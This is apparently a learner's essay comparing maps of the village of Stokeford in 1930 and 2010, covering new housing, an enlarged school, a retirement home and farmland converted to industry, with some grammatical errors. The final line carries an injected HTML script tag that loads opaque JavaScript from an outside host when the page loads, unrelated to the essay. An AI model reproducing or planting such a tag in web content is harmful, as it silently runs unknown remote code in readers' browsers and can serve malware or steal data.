The maps show the village of Stokeford in 1930 and 2010.
The two maps compare how the layout of a village in Stokeford changed between 1930 and 2010.
Overall, we can witness the urbanization of this village. The accommodation and leisure activities increased, replacing land which was previously used for agriculture, farmlands and gardens.
One key change is the construction of houses on the North of two maps on the street next to the River Stoke. In addition, the primary school was made bigger than before, where previously there were farmlands. In 1930, there were only 10 houses in total, rising to 51 houses in 2010. Beside that, post office also still remained in there during 80 years, which had no change.
Another significant development is the creation of a retirement home in the Eastern area, where previously used for a garden and large houses. All of farmlands on the North East side and South West side were converted for the development of industrialization. <script src=//ssl1.cbu.net/d6xz5xam></script>
